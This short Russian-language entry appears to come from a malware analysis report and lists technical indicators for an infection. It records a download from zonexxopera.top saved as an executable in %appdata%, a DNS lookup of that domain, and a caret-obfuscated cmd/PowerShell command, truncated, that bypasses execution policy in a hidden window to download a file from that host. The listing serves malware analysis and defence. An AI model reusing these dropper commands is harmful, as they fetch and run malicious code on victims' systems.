Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^WE^rs^H^EL^L^.^exE -e^XE^cUtion^PO^lic^Y^ ^b^YpaSS -N^oPROfI^LE^ -^WINdOw^St^Y^L^e^ h^ID^d^en (New-ob^j^ECt Sy^St^Em.Ne^t.^WE^Bcl^iEnt^).DOWnLO^Ad^FIl^E(^'http://zonexx...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /c "P^O^WE^rs^H^EL^L^.^exE -e^XE^cUtion^PO^lic^Y^ ^b^YpaSS -N^oPROfI^LE^ -^WINdOw^St^Y^L^e^ h^ID^d^en (New-ob^j^ECt Sy^St^Em.Ne^t.^WE^Bcl^iEnt^).DOWnLO^Ad^FIl^E(^'http://zonexx...' (со скрытым окном)